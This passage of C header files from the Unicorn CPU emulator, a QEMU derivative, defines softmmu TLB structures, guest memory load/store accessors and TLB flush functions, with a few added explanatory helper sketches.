when single-stepping. 
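 */

/*
 * Editor's illustrative sketch -- not part of the original header.
 * Worked example of the page macros above: with 4 KiB target pages
 * (TARGET_PAGE_BITS == 12), TARGET_PAGE_MASK == ~0xfff, so
 * (0x12345 & TARGET_PAGE_MASK) == 0x12000 and
 * TARGET_PAGE_ALIGN(0x12345) == 0x13000 (rounds up to the next page).
 * The helper name is hypothetical; it assumes the build without
 * TARGET_PAGE_BITS_VARY, where the macros need no uc pointer in scope.
 */
static inline target_ulong target_page_offset(target_ulong addr)
{
    return addr & ~TARGET_PAGE_MASK;
}

/* Interrupt bits that are masked while single-stepping: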
*/ #define CPU_INTERRUPT_SSTEP_MASK \ (CPU_INTERRUPT_HARD \ | CPU_INTERRUPT_TGT_EXT_0 \ | CPU_INTERRUPT_TGT_EXT_1 \ | CPU_INTERRUPT_TGT_EXT_2 \ | CPU_INTERRUPT_TGT_EXT_3 \ | CPU_INTERRUPT_TGT_EXT_4) /* * Flags stored in the low bits of the TLB virtual address. * These are defined so that fast path ram access is all zeros. * The flags all must be between TARGET_PAGE_BITS and * maximum address alignment bit. * * Use TARGET_PAGE_BITS_MIN so that these bits are constant * when TARGET_PAGE_BITS_VARY is in effect. */ /* Zero if TLB entry is valid. */ #define TLB_INVALID_MASK (1 << (TARGET_PAGE_BITS_MIN - 1)) /* Set if TLB entry references a clean RAM page. The iotlb entry will contain the page physical address. */ #define TLB_NOTDIRTY (1 << (TARGET_PAGE_BITS_MIN - 2)) /* Set if TLB entry is an IO callback. */ #define TLB_MMIO (1 << (TARGET_PAGE_BITS_MIN - 3)) /* Set if TLB entry contains a watchpoint. */ #define TLB_WATCHPOINT (1 << (TARGET_PAGE_BITS_MIN - 4)) /* Set if TLB entry requires byte swap. */ #define TLB_BSWAP (1 << (TARGET_PAGE_BITS_MIN - 5)) /* Set if TLB entry writes ignored. */ #define TLB_DISCARD_WRITE (1 << (TARGET_PAGE_BITS_MIN - 6)) /* Use this mask to check interception with an alignment mask * in a TCG backend. */ #define TLB_FLAGS_MASK \ (TLB_INVALID_MASK | TLB_NOTDIRTY | TLB_MMIO \ | TLB_WATCHPOINT | TLB_BSWAP | TLB_DISCARD_WRITE) /** * tlb_hit_page: return true if page aligned @addr is a hit against the * TLB entry @tlb_addr * * @addr: virtual address to test (must be page aligned) * @tlb_addr: TLB entry address (a CPUTLBEntry addr_read/write/code value) */ static inline bool tlb_hit_page(struct uc_struct *uc, target_ulong tlb_addr, target_ulong addr) { return addr == (tlb_addr & (TARGET_PAGE_MASK | TLB_INVALID_MASK)); } /** * tlb_hit: return true if @addr is a hit against the TLB entry @tlb_addr * * @addr: virtual address to test (need not be page aligned) * @tlb_addr: TLB entry address (a CPUTLBEntry addr_read/write/code value) */ static inline bool tlb_hit(struct uc_struct *uc, target_ulong tlb_addr, target_ulong addr) { return tlb_hit_page(uc, tlb_addr, addr & TARGET_PAGE_MASK); } int cpu_memory_rw_debug(CPUState *cpu, target_ulong addr, void *ptr, target_ulong len, bool is_write); int cpu_exec(struct uc_struct *uc, CPUState *cpu); /** * cpu_set_cpustate_pointers(cpu) * @cpu: The cpu object * * Set the generic pointers in CPUState into the outer object. */ static inline void cpu_set_cpustate_pointers(ArchCPU *cpu) { cpu->parent_obj.env_ptr = &cpu->env; cpu->parent_obj.icount_decr_ptr = &cpu->neg.icount_decr; } /** * env_archcpu(env) * @env: The architecture environment * * Return the ArchCPU associated with the environment. */ static inline ArchCPU *env_archcpu(CPUArchState *env) { return container_of(env, ArchCPU, env); } /** * env_cpu(env) * @env: The architecture environment * * Return the CPUState associated with the environment. */ static inline CPUState *env_cpu(CPUArchState *env) { return &env_archcpu(env)->parent_obj; } /** * env_neg(env) * @env: The architecture environment * * Return the CPUNegativeOffsetState associated with the environment. */ static inline CPUNegativeOffsetState *env_neg(CPUArchState *env) { ArchCPU *arch_cpu = container_of(env, ArchCPU, env); return &arch_cpu->neg; } /** * cpu_neg(cpu) * @cpu: The generic CPUState * * Return the CPUNegativeOffsetState associated with the cpu. 
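 */

/*
 * Editor's illustrative sketch -- not part of the original header.
 * Typical use of tlb_hit() above: compare one comparator of a TLB entry
 * against a guest virtual address. The helper name is hypothetical, and
 * it assumes CPUTLBEntry (from exec/cpu-defs.h) is visible at this point.
 */
static inline bool tlb_entry_matches_read(struct uc_struct *uc,
                                          const CPUTLBEntry *entry,
                                          target_ulong vaddr)
{
    return tlb_hit(uc, entry->addr_read, vaddr);
}

/* cpu_neg(cpu), continued: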
 */
static inline CPUNegativeOffsetState *cpu_neg(CPUState *cpu)
{
    ArchCPU *arch_cpu = container_of(cpu, ArchCPU, parent_obj);
    return &arch_cpu->neg;
}

/**
 * env_tlb(env)
 * @env: The architecture environment
 *
 * Return the CPUTLB state associated with the environment.
 */
static inline CPUTLB *env_tlb(CPUArchState *env)
{
    return &env_neg(env)->tlb;
}

#endif /* CPU_ALL_H */

unicorn-2.1.1/qemu/include/exec/cpu-common.h

#ifndef CPU_COMMON_H
#define CPU_COMMON_H

/* CPU interfaces that are target independent.  */

#include "exec/hwaddr.h"

/* The CPU list lock nests outside page_(un)lock or mmap_(un)lock */
void qemu_init_cpu_list(void);
void cpu_list_lock(void);
void cpu_list_unlock(void);

void tcg_flush_softmmu_tlb(struct uc_struct *uc);

enum device_endian {
    DEVICE_NATIVE_ENDIAN,
    DEVICE_BIG_ENDIAN,
    DEVICE_LITTLE_ENDIAN,
};

#if defined(HOST_WORDS_BIGENDIAN)
#define DEVICE_HOST_ENDIAN DEVICE_BIG_ENDIAN
#else
#define DEVICE_HOST_ENDIAN DEVICE_LITTLE_ENDIAN
#endif

/* address in the RAM (different from a physical address) */
typedef uintptr_t ram_addr_t;
# define RAM_ADDR_MAX UINTPTR_MAX
# define RAM_ADDR_FMT "%" PRIxPTR

/* memory API */

typedef void CPUWriteMemoryFunc(void *opaque, hwaddr addr, uint32_t value);
typedef uint32_t CPUReadMemoryFunc(void *opaque, hwaddr addr);

/* This should not be used by devices.
 */
ram_addr_t qemu_ram_addr_from_host(struct uc_struct *uc, void *ptr);
RAMBlock *qemu_ram_block_from_host(struct uc_struct *uc, void *ptr, bool round_offset, ram_addr_t *offset);
ram_addr_t qemu_ram_block_host_offset(RAMBlock *rb, void *host);
void *qemu_ram_get_host_addr(RAMBlock *rb);
ram_addr_t qemu_ram_get_offset(RAMBlock *rb);
ram_addr_t qemu_ram_get_used_length(RAMBlock *rb);
bool qemu_ram_is_shared(RAMBlock *rb);

size_t qemu_ram_pagesize(RAMBlock *block);
size_t qemu_ram_pagesize_largest(void);

bool cpu_physical_memory_rw(AddressSpace *as, hwaddr addr, void *buf, hwaddr len, bool is_write);
static inline void cpu_physical_memory_read(AddressSpace *as, hwaddr addr, void *buf, hwaddr len)
{
    cpu_physical_memory_rw(as, addr, buf, len, false);
}
static inline void cpu_physical_memory_write(AddressSpace *as, hwaddr addr, const void *buf, hwaddr len)
{
    cpu_physical_memory_rw(as, addr, (void *)buf, len, true);
}
void *cpu_physical_memory_map(AddressSpace *as, hwaddr addr, hwaddr *plen, bool is_write);
void cpu_physical_memory_unmap(AddressSpace *as, void *buffer, hwaddr len, bool is_write, hwaddr access_len);

bool cpu_physical_memory_is_io(AddressSpace *as, hwaddr phys_addr);

void cpu_flush_icache_range(AddressSpace *as, hwaddr start, hwaddr len);

int ram_block_discard_range(struct uc_struct *uc, RAMBlock *rb, uint64_t start, size_t length);

#endif /* CPU_COMMON_H */

unicorn-2.1.1/qemu/include/exec/cpu-defs.h

/*
 * common defines for all CPUs
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #ifndef CPU_DEFS_H #define CPU_DEFS_H #ifndef NEED_CPU_H #error cpu.h included from common code #endif #include "qemu/host-utils.h" #include "qemu/thread.h" #include "tcg-target.h" #include "exec/hwaddr.h" #include "exec/memattrs.h" #include "hw/core/cpu.h" #include "cpu-param.h" #ifndef TARGET_LONG_BITS # error TARGET_LONG_BITS must be defined in cpu-param.h #endif #ifndef NB_MMU_MODES # error NB_MMU_MODES must be defined in cpu-param.h #endif #ifndef TARGET_PHYS_ADDR_SPACE_BITS # error TARGET_PHYS_ADDR_SPACE_BITS must be defined in cpu-param.h #endif #ifndef TARGET_VIRT_ADDR_SPACE_BITS # error TARGET_VIRT_ADDR_SPACE_BITS must be defined in cpu-param.h #endif #ifndef TARGET_PAGE_BITS # ifdef TARGET_PAGE_BITS_VARY # ifndef TARGET_PAGE_BITS_MIN # error TARGET_PAGE_BITS_MIN must be defined in cpu-param.h # endif # else # error TARGET_PAGE_BITS must be defined in cpu-param.h # endif #endif #define TARGET_LONG_SIZE (TARGET_LONG_BITS / 8) /* target_ulong is the type of a virtual address */ #if TARGET_LONG_SIZE == 4 typedef int32_t target_long; typedef uint32_t target_ulong; #define TARGET_FMT_lx "%08x" #define TARGET_FMT_ld "%d" #define TARGET_FMT_lu "%u" #elif TARGET_LONG_SIZE == 8 typedef int64_t target_long; typedef uint64_t target_ulong; #define TARGET_FMT_lx "%016" PRIx64 #define TARGET_FMT_ld "%" PRId64 #define TARGET_FMT_lu "%" PRIu64 #else #error TARGET_LONG_SIZE undefined #endif /* use a fully associative victim tlb of 8 entries */ #define CPU_VTLB_SIZE 8 #if HOST_LONG_BITS == 32 && TARGET_LONG_BITS == 32 #define CPU_TLB_ENTRY_BITS 5 #else #define CPU_TLB_ENTRY_BITS 6 #endif #define CPU_TLB_DYN_MIN_BITS 6 #define CPU_TLB_DYN_DEFAULT_BITS 8 # if HOST_LONG_BITS == 32 /* Make sure we do not require a double-word shift for the TLB load */ # define CPU_TLB_DYN_MAX_BITS (32 - TARGET_PAGE_BITS) # else /* HOST_LONG_BITS == 64 */ /* * Assuming TARGET_PAGE_BITS==12, with 2**22 entries we can cover 2**(22+12) == * 2**34 == 16G of address space. This is roughly what one would expect a * TLB to cover in a modern (as of 2018) x86_64 CPU. For instance, Intel * Skylake's Level-2 STLB has 16 1G entries. * Also, make sure we do not size the TLB past the guest's address space. */ # define CPU_TLB_DYN_MAX_BITS \ MIN(22, TARGET_VIRT_ADDR_SPACE_BITS - TARGET_PAGE_BITS) # endif typedef struct CPUTLBEntry { /* bit TARGET_LONG_BITS to TARGET_PAGE_BITS : virtual address bit TARGET_PAGE_BITS-1..4 : Nonzero for accesses that should not go directly to ram. bit 3 : indicates that the entry is invalid bit 2..0 : zero */ union { struct { target_ulong addr_read; target_ulong addr_write; target_ulong addr_code; target_ulong paddr; /* Addend to virtual address to get host address. IO accesses use the corresponding iotlb value. */ uintptr_t addend; }; /* padding to get a power of two size */ uint8_t dummy[1 << CPU_TLB_ENTRY_BITS]; }; } CPUTLBEntry; QEMU_BUILD_BUG_ON(sizeof(CPUTLBEntry) != (1 << CPU_TLB_ENTRY_BITS)); /* The IOTLB is not accessed directly inline by generated TCG code, * so the CPUIOTLBEntry layout is not as critical as that of the * CPUTLBEntry. (This is also why we don't want to combine the two * structs into one.) 
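 */

/*
 * Editor's illustrative sketch -- not part of the original header.
 * The arithmetic behind CPU_TLB_DYN_MAX_BITS above: a TLB with 2^bits
 * entries, each mapping one target page, covers 2^(bits + TARGET_PAGE_BITS)
 * bytes of guest address space -- e.g. 2^22 entries * 2^12-byte pages
 * = 16 GiB, the figure quoted in the comment above. The helper name is
 * hypothetical.
 */
static inline uint64_t tlb_bytes_covered(unsigned bits)
{
    return (uint64_t)1 << (bits + TARGET_PAGE_BITS);
}

/* CPUIOTLBEntry, continued: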
*/ typedef struct CPUIOTLBEntry { /* * @addr contains: * - in the lower TARGET_PAGE_BITS, a physical section number * - with the lower TARGET_PAGE_BITS masked off, an offset which * must be added to the virtual address to obtain: * + the ram_addr_t of the target RAM (if the physical section * number is PHYS_SECTION_NOTDIRTY or PHYS_SECTION_ROM) * + the offset within the target MemoryRegion (otherwise) */ hwaddr addr; MemTxAttrs attrs; } CPUIOTLBEntry; /* * Data elements that are per MMU mode, minus the bits accessed by * the TCG fast path. */ typedef struct CPUTLBDesc { /* * Describe a region covering all of the large pages allocated * into the tlb. When any page within this region is flushed, * we must flush the entire tlb. The region is matched if * (addr & large_page_mask) == large_page_addr. */ target_ulong large_page_addr; target_ulong large_page_mask; /* host time (in ns) at the beginning of the time window */ int64_t window_begin_ns; /* maximum number of entries observed in the window */ size_t window_max_entries; size_t n_used_entries; /* The next index to use in the tlb victim table. */ size_t vindex; /* The tlb victim table, in two parts. */ CPUTLBEntry vtable[CPU_VTLB_SIZE]; CPUIOTLBEntry viotlb[CPU_VTLB_SIZE]; /* The iotlb. */ CPUIOTLBEntry *iotlb; } CPUTLBDesc; /* * Data elements that are per MMU mode, accessed by the fast path. * The structure is aligned to aid loading the pair with one insn. */ typedef struct CPUTLBDescFast { /* Contains (n_entries - 1) << CPU_TLB_ENTRY_BITS */ uintptr_t mask; /* The array of tlb entries itself. */ CPUTLBEntry *table; } CPUTLBDescFast QEMU_ALIGNED(2 * sizeof(void *)); /* * Data elements that are shared between all MMU modes. */ typedef struct CPUTLBCommon { /* * Within dirty, for each bit N, modifications have been made to * mmu_idx N since the last time that mmu_idx was flushed. * Protected by tlb_c.lock. */ uint16_t dirty; /* * Statistics. These are not lock protected, but are read and * written atomically. This allows the monitor to print a snapshot * of the stats without interfering with the cpu. */ size_t full_flush_count; size_t part_flush_count; size_t elide_flush_count; } CPUTLBCommon; /* * The entire softmmu tlb, for all MMU modes. * The meaning of each of the MMU modes is defined in the target code. * Since this is placed within CPUNegativeOffsetState, the smallest * negative offsets are at the end of the struct. */ typedef struct CPUTLB { CPUTLBCommon c; CPUTLBDesc d[NB_MMU_MODES]; CPUTLBDescFast f[NB_MMU_MODES]; } CPUTLB; /* This will be used by TCG backends to compute offsets. */ #define TLB_MASK_TABLE_OFS(IDX) \ ((int)offsetof(ArchCPU, neg.tlb.f[IDX]) - (int)offsetof(ArchCPU, env)) /* * This structure must be placed in ArchCPU immediately * before CPUArchState, as a field named "neg". 
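 */

/*
 * Editor's illustrative sketch -- not part of the original header.
 * CPUTLBDescFast.mask above stores (n_entries - 1) << CPU_TLB_ENTRY_BITS,
 * so the entry count of a fast table can be recovered as below. The
 * helper name is hypothetical.
 */
static inline size_t tlb_n_entries_from_mask(uintptr_t mask)
{
    return (mask >> CPU_TLB_ENTRY_BITS) + 1;
}

/* CPUNegativeOffsetState, continued: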
 */
typedef struct CPUNegativeOffsetState {
    CPUTLB tlb;
    IcountDecr icount_decr;
} CPUNegativeOffsetState;

#endif

unicorn-2.1.1/qemu/include/exec/cpu_ldst.h

/*
 * Software MMU support
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 *
 */

/*
 * Generate inline load/store functions for all MMU modes (typically
 * at least _user and _kernel) as well as _data versions, for all data
 * sizes.
 *
 * Used by target op helpers.
 *
 * The syntax for the accessors is:
 *
 * load:  cpu_ld{sign}{size}_{mmusuffix}(env, ptr)
 *        cpu_ld{sign}{size}_{mmusuffix}_ra(env, ptr, retaddr)
 *        cpu_ld{sign}{size}_mmuidx_ra(env, ptr, mmu_idx, retaddr)
 *
 * store: cpu_st{size}_{mmusuffix}(env, ptr, val)
 *        cpu_st{size}_{mmusuffix}_ra(env, ptr, val, retaddr)
 *        cpu_st{size}_mmuidx_ra(env, ptr, val, mmu_idx, retaddr)
 *
 * sign is:
 * (empty): for 32 and 64 bit sizes
 *   u    : unsigned
 *   s    : signed
 *
 * size is:
 *   b: 8 bits
 *   w: 16 bits
 *   l: 32 bits
 *   q: 64 bits
 *
 * mmusuffix is one of the generic suffixes "data" or "code", or "mmuidx".
 * The "mmuidx" suffix carries an extra mmu_idx argument that specifies
 * the index to use; the "data" and "code" suffixes take the index from
 * cpu_mmu_index().
*/ #ifndef CPU_LDST_H #define CPU_LDST_H #include "cpu-defs.h" #include "cpu.h" typedef target_ulong abi_ptr; #define TARGET_ABI_FMT_ptr TARGET_ABI_FMT_lx uint32_t cpu_ldub_data(CPUArchState *env, abi_ptr ptr); uint32_t cpu_lduw_data(CPUArchState *env, abi_ptr ptr); uint32_t cpu_ldl_data(CPUArchState *env, abi_ptr ptr); uint64_t cpu_ldq_data(CPUArchState *env, abi_ptr ptr); int cpu_ldsb_data(CPUArchState *env, abi_ptr ptr); int cpu_ldsw_data(CPUArchState *env, abi_ptr ptr); uint32_t cpu_ldub_data_ra(CPUArchState *env, abi_ptr ptr, uintptr_t retaddr); uint32_t cpu_lduw_data_ra(CPUArchState *env, abi_ptr ptr, uintptr_t retaddr); uint32_t cpu_ldl_data_ra(CPUArchState *env, abi_ptr ptr, uintptr_t retaddr); uint64_t cpu_ldq_data_ra(CPUArchState *env, abi_ptr ptr, uintptr_t retaddr); int cpu_ldsb_data_ra(CPUArchState *env, abi_ptr ptr, uintptr_t retaddr); int cpu_ldsw_data_ra(CPUArchState *env, abi_ptr ptr, uintptr_t retaddr); void cpu_stb_data(CPUArchState *env, abi_ptr ptr, uint32_t val); void cpu_stw_data(CPUArchState *env, abi_ptr ptr, uint32_t val); void cpu_stl_data(CPUArchState *env, abi_ptr ptr, uint32_t val); void cpu_stq_data(CPUArchState *env, abi_ptr ptr, uint64_t val); void cpu_stb_data_ra(CPUArchState *env, abi_ptr ptr, uint32_t val, uintptr_t retaddr); void cpu_stw_data_ra(CPUArchState *env, abi_ptr ptr, uint32_t val, uintptr_t retaddr); void cpu_stl_data_ra(CPUArchState *env, abi_ptr ptr, uint32_t val, uintptr_t retaddr); void cpu_stq_data_ra(CPUArchState *env, abi_ptr ptr, uint64_t val, uintptr_t retaddr); /* Needed for TCG_OVERSIZED_GUEST */ #include "tcg/tcg.h" static inline target_ulong tlb_addr_write(const CPUTLBEntry *entry) { return entry->addr_write; } /* Find the TLB index corresponding to the mmu_idx + address pair. */ static inline uintptr_t tlb_index(CPUArchState *env, uintptr_t mmu_idx, target_ulong addr) { #ifdef TARGET_ARM struct uc_struct *uc = env->uc; #endif uintptr_t size_mask = env_tlb(env)->f[mmu_idx].mask >> CPU_TLB_ENTRY_BITS; return (addr >> TARGET_PAGE_BITS) & size_mask; } /* Find the TLB entry corresponding to the mmu_idx + address pair. 
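 */

/*
 * Editor's illustrative sketch -- not part of the original header.
 * Worked example of tlb_index() above: with 4 KiB pages and a 256-entry
 * fast table (mask >> CPU_TLB_ENTRY_BITS == 0xff), address 0x12345678
 * indexes slot (0x12345678 >> 12) & 0xff == 0x45. A read lookup then
 * combines the indexed entry with tlb_hit() from exec/cpu-all.h, as below;
 * tlb_entry(), defined just after this, wraps the same table access. The
 * helper name is hypothetical, and it assumes env exposes its uc_struct
 * as env->uc, as tlb_index() above does for Arm.
 */
static inline bool tlb_read_lookup_hits(CPUArchState *env, uintptr_t mmu_idx,
                                        target_ulong addr)
{
    uintptr_t i = tlb_index(env, mmu_idx, addr);
    CPUTLBEntry *e = &env_tlb(env)->f[mmu_idx].table[i];
    return tlb_hit(env->uc, e->addr_read, addr);
}

/* Find the TLB entry corresponding to the mmu_idx + address pair (continued):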
 */
static inline CPUTLBEntry *tlb_entry(CPUArchState *env, uintptr_t mmu_idx,
                                     target_ulong addr)
{
    return &env_tlb(env)->f[mmu_idx].table[tlb_index(env, mmu_idx, addr)];
}

uint32_t cpu_ldub_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra);
uint32_t cpu_lduw_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra);
uint32_t cpu_ldl_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra);
uint64_t cpu_ldq_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra);
int cpu_ldsb_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra);
int cpu_ldsw_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra);

void cpu_stb_mmuidx_ra(CPUArchState *env, abi_ptr addr, uint32_t val, int mmu_idx, uintptr_t retaddr);
void cpu_stw_mmuidx_ra(CPUArchState *env, abi_ptr addr, uint32_t val, int mmu_idx, uintptr_t retaddr);
void cpu_stl_mmuidx_ra(CPUArchState *env, abi_ptr addr, uint32_t val, int mmu_idx, uintptr_t retaddr);
void cpu_stq_mmuidx_ra(CPUArchState *env, abi_ptr addr, uint64_t val, int mmu_idx, uintptr_t retaddr);

uint32_t cpu_ldub_code(CPUArchState *env, abi_ptr addr);
uint32_t cpu_lduw_code(CPUArchState *env, abi_ptr addr);
uint32_t cpu_ldl_code(CPUArchState *env, abi_ptr addr);
uint64_t cpu_ldq_code(CPUArchState *env, abi_ptr addr);

static inline int cpu_ldsb_code(CPUArchState *env, abi_ptr addr)
{
    return (int8_t)cpu_ldub_code(env, addr);
}

static inline int cpu_ldsw_code(CPUArchState *env, abi_ptr addr)
{
    return (int16_t)cpu_lduw_code(env, addr);
}

/**
 * tlb_vaddr_to_host:
 * @env: CPUArchState
 * @addr: guest virtual address to look up
 * @access_type: 0 for read, 1 for write, 2 for execute
 * @mmu_idx: MMU index to use for lookup
 *
 * Look up the specified guest virtual index in the TCG softmmu TLB.
 * If we can translate a host virtual address suitable for direct RAM
 * access, without causing a guest exception, then return it.
 * Otherwise (TLB entry is for an I/O access, guest software
 * TLB fill required, etc) return NULL.
 */
void *tlb_vaddr_to_host(CPUArchState *env, abi_ptr addr,
                        MMUAccessType access_type, int mmu_idx);

#endif /* CPU_LDST_H */

unicorn-2.1.1/qemu/include/exec/cputlb.h

/*
 * Common CPU TLB handling
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
unicorn-2.1.1/qemu/include/exec/cputlb.h
/*
 * Common CPU TLB handling
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */
#ifndef CPUTLB_H
#define CPUTLB_H
#include "exec/cpu-common.h"
/* cputlb.c */
void tlb_protect_code(struct uc_struct *uc, ram_addr_t ram_addr);
void tlb_unprotect_code(struct uc_struct *uc, ram_addr_t ram_addr);
#endif
unicorn-2.1.1/qemu/include/exec/exec-all.h
/*
 * internal execution defines for qemu
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */
#ifndef EXEC_ALL_H
#define EXEC_ALL_H
#include "hw/core/cpu.h"
#include "exec/tb-context.h"
#include "exec/cpu_ldst.h"
#include "sysemu/cpus.h"
/* allow to see translation results - the slowdown should be negligible, so we leave it */
#define DEBUG_DISAS
/* Page tracking code uses ram addresses in system mode, and virtual
   addresses in userspace mode.  Define tb_page_addr_t to be an appropriate
   type. */
typedef ram_addr_t tb_page_addr_t;
#define TB_PAGE_ADDR_FMT RAM_ADDR_FMT
#include "qemu/log.h"
void gen_intermediate_code(CPUState *cpu, TranslationBlock *tb, int max_insns);
void restore_state_to_opc(CPUArchState *env, TranslationBlock *tb, target_ulong *data);
/**
 * cpu_restore_state:
 * @cpu: the vCPU whose state is to be restored
 * @searched_pc: the host PC the fault occurred at
 * @will_exit: true if the TB executed will be interrupted after some
               cpu adjustments. Required for maintaining the correct
               icount values
 * @return: true if state was restored, false otherwise
 *
 * Attempt to restore the state for a fault occurring in translated
 * code. If the searched_pc is not in translated code no state is
 * restored and the function returns false.
 */
bool cpu_restore_state(CPUState *cpu, uintptr_t searched_pc, bool will_exit);
void QEMU_NORETURN cpu_loop_exit_noexc(CPUState *cpu);
void QEMU_NORETURN cpu_io_recompile(CPUState *cpu, uintptr_t retaddr);
TranslationBlock *tb_gen_code(CPUState *cpu, target_ulong pc, target_ulong cs_base, uint32_t flags, int cflags);
void QEMU_NORETURN cpu_loop_exit(CPUState *cpu);
void QEMU_NORETURN cpu_loop_exit_restore(CPUState *cpu, uintptr_t pc);
void QEMU_NORETURN cpu_loop_exit_atomic(CPUState *cpu, uintptr_t pc);
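The _restore variant matters when a helper raises a guest exception: it first rewinds guest PC and flags to the faulting instruction using the host return address, then longjmps out of the TB. A minimal sketch follows; the helper name and the exception number are assumptions for illustration, and env_cpu() is assumed to be the usual CPUArchState-to-CPUState accessor from the CPU headers.

/* Illustrative sketch only: a hypothetical helper that aborts execution
 * of the current TB with a guest exception.
 */
void helper_demo_fault(CPUArchState *env)
{
    CPUState *cs = env_cpu(env);  /* assumed accessor from hw/core/cpu.h */
    cs->exception_index = 1;      /* hypothetical exception number */
    cpu_loop_exit_restore(cs, GETPC());
}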
/**
 * cpu_loop_exit_requested:
 * @cpu: The CPU state to be tested
 *
 * Indicate if somebody asked for a return of the CPU to the main loop
 * (e.g., via cpu_exit() or cpu_interrupt()).
 *
 * This is helpful for architectures that support interruptible
 * instructions. After writing back all state to registers/memory, this
 * call can be used to check if it makes sense to return to the main loop
 * or to continue executing the interruptible instruction.
 */
static inline bool cpu_loop_exit_requested(CPUState *cpu)
{
    return (int32_t)cpu_neg(cpu)->icount_decr.u32 < 0;
}
void cpu_reloading_memory_map(void);
/**
 * cpu_address_space_init:
 * @cpu: CPU to add this address space to
 * @asidx: integer index of this address space
 * @mr: the root memory region of address space
 *
 * Add the specified address space to the CPU's cpu_ases list.
 * The address space added with @asidx 0 is the one used for the
 * convenience pointer cpu->as.
 * The target-specific code which registers ASes is responsible
 * for defining what semantics address space 0, 1, 2, etc have.
 *
 * Before the first call to this function, the caller must set
 * cpu->num_ases to the total number of address spaces it needs
 * to support.
 */
void cpu_address_space_init(CPUState *cpu, int asidx, MemoryRegion *mr);
/* cputlb.c */
/**
 * tlb_init - initialize a CPU's TLB
 * @cpu: CPU whose TLB should be initialized
 */
void tlb_init(CPUState *cpu);
/**
 * tlb_flush_page:
 * @cpu: CPU whose TLB should be flushed
 * @addr: virtual address of page to be flushed
 *
 * Flush one page from the TLB of the specified CPU, for all
 * MMU indexes.
 */
void tlb_flush_page(CPUState *cpu, target_ulong addr);
/**
 * tlb_flush_page_all_cpus:
 * @cpu: src CPU of the flush
 * @addr: virtual address of page to be flushed
 *
 * Flush one page from the TLB of all CPUs, for all
 * MMU indexes.
 */
void tlb_flush_page_all_cpus(CPUState *src, target_ulong addr);
/**
 * tlb_flush_page_all_cpus_synced:
 * @cpu: src CPU of the flush
 * @addr: virtual address of page to be flushed
 *
 * Flush one page from the TLB of all CPUs, for all MMU indexes, like
 * tlb_flush_page_all_cpus, except that the source vCPU's work is
 * scheduled as safe work, meaning all flushes are complete once the
 * source vCPU's safe work is complete. This will depend on when
 * the guest's translation ends the TB.
 */
void tlb_flush_page_all_cpus_synced(CPUState *src, target_ulong addr);
/**
 * tlb_flush:
 * @cpu: CPU whose TLB should be flushed
 *
 * Flush the entire TLB for the specified CPU. Most CPU architectures
 * allow the implementation to drop entries from the TLB at any time
 * so this is generally safe. If more selective flushing is required
 * use one of the other functions for efficiency.
 */
void tlb_flush(CPUState *cpu);
/**
 * tlb_flush_all_cpus:
 * @cpu: src CPU of the flush
 */
void tlb_flush_all_cpus(CPUState *src_cpu);
/**
 * tlb_flush_all_cpus_synced:
 * @cpu: src CPU of the flush
 *
 * Like tlb_flush_all_cpus, except that the source vCPU's work is
 * scheduled as safe work, meaning all flushes are complete once the
 * source vCPU's safe work is complete. This will depend on when
 * the guest's translation ends the TB.
 */
void tlb_flush_all_cpus_synced(CPUState *src_cpu);
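As a usage note, these flushes are what keep the softmmu TLB coherent with guest page tables: whenever the emulator changes a mapping or its protection, any cached translation for the affected page must be dropped. A minimal sketch, with a hypothetical caller name:

/* Illustrative sketch only: after a hypothetical guest page-table
 * update changes one page's protection, invalidate its cached
 * translation in every MMU index. Use the _by_mmuidx variant instead
 * when only some translation regimes are affected.
 */
static void demo_page_prot_changed(CPUState *cpu, target_ulong vaddr)
{
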